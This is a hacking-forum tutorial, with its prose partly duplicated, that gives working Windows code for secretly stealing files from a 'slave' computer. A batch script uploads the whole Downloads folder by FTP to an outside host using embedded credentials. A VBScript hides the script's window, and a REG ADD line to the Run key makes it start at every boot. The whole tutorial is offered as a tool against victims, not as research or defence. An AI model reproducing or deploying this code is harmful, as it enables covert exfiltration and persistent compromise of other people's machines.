We need to create FTP access to our HOST and start uploading and downloading files.
Below is Batch File that will upload all Download Folder to your HOST :-
Change Username "krokite" with your FTP_Username, "secret_pass" with your FTP_Password and "box.myanyfreehosting.com" to your HOST_IP or HOSTNAME or IP.
Save the above file with "myhack.bat" and run them, you will see it runs and blinks for a while while its uploading the file.
Above Code will Upload all the contents inside Downloads Folder...
Now to Download any File to your Slave's Slave, just use "get" or "mget" command along with your Filename, I leave that part as your DeskJob. Try it and if you couldnot I am always here.
I have used %UserProfile% in this Batch Code, it will get Current User's Profile Directory.
To know more about Variables used in Windows Command Prompt, Follow this URL :- http://www.microsoft.com/resources/docum...rview.mspx
Here is small snippet of VbScript that will run this program in hidden mode :-
save the file with name "krokiteworldofhacker.vbs"
the above code is assumed that your "myhack.bat" file is stored in "C:\", and if you run this script , you will see no changes..
Now Open Task Manager and run same file again, than now you will see cmd.exe file pops in the task manager, that implies your file is running in Hidden Mode.
How you can do same with BATCH, here is the code :-
And your File will Run Every time in Hidden Mode Whenever your Slave Windows Starts, and will upload all files of Download Folder.
I have written thlis program in complete Hurry Mode, as you all know, today is 1st Jan,2013 and I am sitting writting tutorial for you, on this Day. Well if you don't get any of its part, Reply here, I will let you know
Below is Batch File that will upload all Download Folder to your HOST :-
@echo off
title FTP Command
cd %UserPrfoile%
echo user krokite> ftpcmd.dat
echo secret_pass>> ftpcmd.dat
echo bin>> ftpcmd.dat
echo put Downloads\*.* >> ftpcmd.dat
echo quit>> ftpcmd.dat
ftp -n -s:ftpcmd.dat box.myanyfreehosting.com
Save the above file with "myhack.bat" and run them, you will see it runs and blinks for a while while its uploading the file.
Above Code will Upload all the contents inside Downloads Folder...
Now to Download any File to your Slave's Slave, just use "get" or "mget" command along with your Filename, I leave that part as your DeskJob. Try it and if you couldnot I am always here.
I have used %UserProfile% in this Batch Code, it will get Current User's Profile Directory.
To know more about Variables used in Windows Command Prompt, Follow this URL :- http://www.microsoft.com/resources/docum...rview.mspx
Now, Back to Topic, When Batch Process is Done .How to make this All in Hidden Mode.
Here is small snippet of VbScript that will run this program in hidden mode :-
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "c:\myhack.bat" & Chr(34), 0
Set WshShell = Nothing
save the file with name "krokiteworldofhacker.vbs"
the above code is assumed that your "myhack.bat" file is stored in "C:\", and if you run this script , you will see no changes..
Now Open Task Manager and run same file again, than now you will see cmd.exe file pops in the task manager, that implies your file is running in Hidden Mode.
Well Step 3:- How to Run this program Every time Windows Starts, place the location of file in
HKCU\Software\Microsoft\Windows\CurrentVersion\Run as REG_STRING data type with Value "c:\locationofyourfile\krokiteworldofhacker.vbs" /autoRun and with name "KroKiteWorldofHacker"
How you can do same with BATCH, here is the code :-
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v KROKITEWORLDOFHACKER /t REG_STRING /d "c:\locationofyourfile\krokiteworldofhacker.vbs /autoRun"
And your File will Run Every time in Hidden Mode Whenever your Slave Windows Starts, and will upload all files of Download Folder.
I have written thlis program in complete Hurry Mode, as you all know, today is 1st Jan,2013 and I am sitting writting tutorial for you, on this Day. Well if you don't get any of its part, Reply here, I will let you know
Good Luck Copyright © KroKite